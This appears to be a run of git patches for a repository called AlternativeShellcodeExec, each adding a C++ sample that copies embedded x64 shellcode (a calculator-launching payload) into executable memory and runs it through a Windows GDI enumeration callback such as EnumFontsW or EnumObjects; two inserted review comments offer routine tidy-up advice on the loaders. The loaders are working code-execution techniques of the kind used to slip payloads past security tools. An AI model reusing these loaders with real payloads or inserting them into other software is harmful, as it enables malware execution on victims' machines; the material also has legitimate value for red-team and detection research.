+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ HDC dc = GetDC(NULL);
+ EnumFontsW(dc, NULL, (FONTENUMPROCW)address, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumFontsW/EnumFontsW.vcxproj b/EnumFontsW/EnumFontsW.vcxproj
new file mode 100644
index 0000000..741df83
--- /dev/null
+++ b/EnumFontsW/EnumFontsW.vcxproj
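Review bot: The device context obtained from `GetDC(NULL)` in `main` is never handed back with `ReleaseDC`, and `dc` is not checked for NULL before it is passed to `EnumFontsW`; add `if (dc == NULL) return 1;` after the `GetDC` line and `ReleaseDC(NULL, dc);` before `return 0;`. The same unreleased, unchecked DC appears in EnumFontFamiliesW.cpp, EnumFontFamiliesExW.cpp and EnumObjects.cpp in the following patches. The return value of `EnumFontsW` is also discarded, so a failed or aborted enumeration leaves no trace for whoever is running the sample; storing it and printing `GetLastError()` on failure would make the sample's behaviour observable.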
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {0091d5e9-a212-4c34-857f-0db13d272aa2} + EnumFontsW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumFontsW/EnumFontsW.vcxproj.filters b/EnumFontsW/EnumFontsW.vcxproj.filters new file mode 100644 index 0000000..ce73f66 --- /dev/null +++ b/EnumFontsW/EnumFontsW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 60a168387795be9b4d5a90de40ee132cc6e9e669 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Fri, 30 Apr 2021 19:33:06 -0400 Subject: [PATCH 20/28] Going to be adding a few from WinGDI.h in the next couple of days.... its a gold mine --- AlternativeShellcodeExec.sln | 10 ++ EnumFontFamiliesW/EnumFontFamiliesW.cpp | 41 +++++ EnumFontFamiliesW/EnumFontFamiliesW.vcxproj | 147 ++++++++++++++++++ .../EnumFontFamiliesW.vcxproj.filters | 22 +++ 4 files changed, 220 insertions(+) create mode 100644 EnumFontFamiliesW/EnumFontFamiliesW.cpp create mode 100644 EnumFontFamiliesW/EnumFontFamiliesW.vcxproj create mode 100644 EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 9370be3..c0e72e7 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -75,6 +75,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImmEnumInputContext", "ImmE EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontsW", "EnumFontsW\EnumFontsW.vcxproj", "{0091D5E9-A212-4C34-857F-0DB13D272AA2}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesW", "EnumFontFamiliesW\EnumFontFamiliesW.vcxproj", "{383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -371,6 +373,14 @@ Global {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x64.Build.0 = Release|x64 {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.ActiveCfg = Release|Win32 {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.Build.0 = Release|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x64.ActiveCfg = Debug|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x64.Build.0 = Debug|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x86.ActiveCfg = Debug|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x86.Build.0 = Debug|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x64.ActiveCfg = Release|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x64.Build.0 = Release|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.ActiveCfg = Release|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumFontFamiliesW/EnumFontFamiliesW.cpp b/EnumFontFamiliesW/EnumFontFamiliesW.cpp new file mode 100644 index 0000000..5d8cf23 --- /dev/null +++ b/EnumFontFamiliesW/EnumFontFamiliesW.cpp 
@@ -0,0 +1,41 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ HDC dc = GetDC(NULL);
+ EnumFontFamiliesW(dc, NULL, (FONTENUMPROCW)address, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj
new file mode 100644
index 0000000..491cbe0
--- /dev/null
+++ b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {383ab5c3-dda6-49aa-b3ac-4f8a63cc7460} + EnumFontFamiliesW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters new file mode 100644 index 0000000..856fbee --- /dev/null +++ b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 106bddc09ff9ce31d5e6d890580563f9bd8de554 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Sat, 1 May 2021 16:31:16 -0400 Subject: [PATCH 21/28] ... --- AlternativeShellcodeExec.sln | 10 ++ EnumFontFamiliesExW/EnumFontFamiliesExW.cpp | 45 ++++++ .../EnumFontFamiliesExW.vcxproj | 147 ++++++++++++++++++ .../EnumFontFamiliesExW.vcxproj.filters | 22 +++ 4 files changed, 224 insertions(+) create mode 100644 EnumFontFamiliesExW/EnumFontFamiliesExW.cpp create mode 100644 EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj create mode 100644 EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index c0e72e7..8a4972a 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -77,6 +77,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontsW", "EnumFontsW\En EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesW", "EnumFontFamiliesW\EnumFontFamiliesW.vcxproj", "{383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesExW", "EnumFontFamiliesExW\EnumFontFamiliesExW.vcxproj", "{F169F79E-D307-4EA9-818D-8C8FF5B7138D}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -381,6 +383,14 @@ Global {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x64.Build.0 = Release|x64 {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.ActiveCfg = Release|Win32 {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.Build.0 = Release|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x64.ActiveCfg = Debug|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x64.Build.0 = Debug|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x86.ActiveCfg = Debug|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x86.Build.0 = Debug|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x64.ActiveCfg = Release|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x64.Build.0 = Release|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.ActiveCfg = Release|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp b/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp new file mode 100644 index 0000000..14e252c --- /dev/null +++ b/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp 
@@ -0,0 +1,45 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ LOGFONTW lf = { 0 };
+ lf.lfCharSet = DEFAULT_CHARSET;
+
+
+ HDC dc = GetDC(NULL);
+ EnumFontFamiliesExW(dc, &lf, (FONTENUMPROCW)address, NULL, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj
new file mode 100644
index 0000000..b83f5d3
--- /dev/null
+++ b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {f169f79e-d307-4ea9-818d-8c8ff5b7138d} + EnumFontFamiliesExW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters new file mode 100644 index 0000000..814edce --- /dev/null +++ b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From e1de09c5f9113e437ba9330c60636ce98a558463 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Mon, 3 May 2021 22:32:55 -0400 Subject: [PATCH 22/28] Getting tired of this project ngl -_- --- AlternativeShellcodeExec.sln | 10 ++ EnumObjects/EnumObjects.cpp | 45 ++++++++ EnumObjects/EnumObjects.vcxproj | 147 ++++++++++++++++++++++++ EnumObjects/EnumObjects.vcxproj.filters | 22 ++++ 4 files changed, 224 insertions(+) create mode 100644 EnumObjects/EnumObjects.cpp create mode 100644 EnumObjects/EnumObjects.vcxproj create mode 100644 EnumObjects/EnumObjects.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 8a4972a..ece02b3 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -79,6 +79,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesW", "EnumFo EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesExW", "EnumFontFamiliesExW\EnumFontFamiliesExW.vcxproj", "{F169F79E-D307-4EA9-818D-8C8FF5B7138D}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumObjects", "EnumObjects\EnumObjects.vcxproj", "{D3788A6D-E9D8-44FF-B368-B42BC341C8F5}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -391,6 +393,14 @@ Global {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x64.Build.0 = Release|x64 {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.ActiveCfg = Release|Win32 {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.Build.0 = Release|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x64.ActiveCfg = Debug|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x64.Build.0 = Debug|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x86.ActiveCfg = Debug|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x86.Build.0 = Debug|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x64.ActiveCfg = Release|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x64.Build.0 = Release|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.ActiveCfg = Release|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumObjects/EnumObjects.cpp b/EnumObjects/EnumObjects.cpp new file mode 100644 index 0000000..5a1465f --- /dev/null +++ b/EnumObjects/EnumObjects.cpp 
@@ -0,0 +1,45 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ LOGFONTW lf = { 0 };
+ lf.lfCharSet = DEFAULT_CHARSET;
+
+
+ HDC dc = GetDC(NULL);
+ EnumObjects(dc, OBJ_BRUSH, (GOBJENUMPROC)address, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumObjects/EnumObjects.vcxproj b/EnumObjects/EnumObjects.vcxproj
new file mode 100644
index 0000000..3627fce
--- /dev/null
+++ b/EnumObjects/EnumObjects.vcxproj
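Review bot: `LOGFONTW lf = { 0 };` and `lf.lfCharSet = DEFAULT_CHARSET;` in `main` are dead code in this file — `EnumObjects` takes an object type (`OBJ_BRUSH`), not a LOGFONTW, and `lf` is never referenced after it is initialised — so they look copied from EnumFontFamiliesExW.cpp and should be removed. Keeping each sample down to the one API call it demonstrates makes the files easier to compare side by side, which is the point of a repository laid out this way.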
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {d3788a6d-e9d8-44ff-b368-b42bc341c8f5} + EnumObjects + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumObjects/EnumObjects.vcxproj.filters b/EnumObjects/EnumObjects.vcxproj.filters new file mode 100644 index 0000000..6f31026 --- /dev/null +++ b/EnumObjects/EnumObjects.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 54a3844db258ebf78a571b38a757968fad2b0875 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Thu, 6 May 2021 19:40:50 -0400 Subject: [PATCH 23/28] Added CryptEnumOIDInfo --- AlternativeShellcodeExec.sln | 10 ++ CryptEnumOIDInfo/CryptEnumOIDInfo.cpp | 44 ++++++ CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj | 147 ++++++++++++++++++ .../CryptEnumOIDInfo.vcxproj.filters | 22 +++ 4 files changed, 223 insertions(+) create mode 100644 CryptEnumOIDInfo/CryptEnumOIDInfo.cpp create mode 100644 CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj create mode 100644 CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index ece02b3..1614824 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -81,6 +81,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesExW", "Enum EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumObjects", "EnumObjects\EnumObjects.vcxproj", "{D3788A6D-E9D8-44FF-B368-B42BC341C8F5}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CryptEnumOIDInfo", "CryptEnumOIDInfo\CryptEnumOIDInfo.vcxproj", "{D21641FB-1935-4ED9-B511-BC80F00B733F}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
